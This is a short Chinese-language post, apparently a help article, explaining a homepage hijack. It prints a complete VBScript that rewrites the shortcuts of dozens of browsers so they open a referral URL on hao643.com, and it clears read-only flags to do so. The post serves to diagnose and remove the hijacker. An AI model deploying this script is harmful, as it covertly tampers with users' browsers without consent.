不知道哪个软件修改了我的主页
如果主页被篡改,而你又不想引入一大堆安全软件到你的电脑中。
当每一段时间(比如说一小时)就会被修改成hao123或其他网址,你还找不到是哪个软件修改的,那么你可以看看这段代码:
On Error Resume Next:Const link = "http://hao643.com/?r=ggggg&m=e22":Const link360 =
"http://hao643.com/?r=ggggg&m=e22&s=3":browsers = "114ie.exe,115chrome.exe,
1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowsr
.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,
launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,
tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,
xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths
="C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,
C:\Users\83692\Desktop,C:\Users\83692\AppData\Roaming\Microsoft\Internet Explorer\Quick
Launch,C:\Users\83692\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User
Pinned\StartMenu,C:\Users\83692\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User
Pinned\TaskBar,C:\Users\83692\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For
Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr =
split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In
lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set
WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder)
Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk"
Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name =
fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If
LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments =
link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End
If:End If:Next:End If:Next:
看到代码中有http://hao643.com这个网址了吗?这段代码的主要内容是:列出了所有浏览器,以及他们的文件位置,还有他们要保持的网址(即这个http://hao643.com),换句话说:你的首页被它劫持了。只要删掉包含这个代码的文件即可,如何删除呢?有很多教程。贴一个教程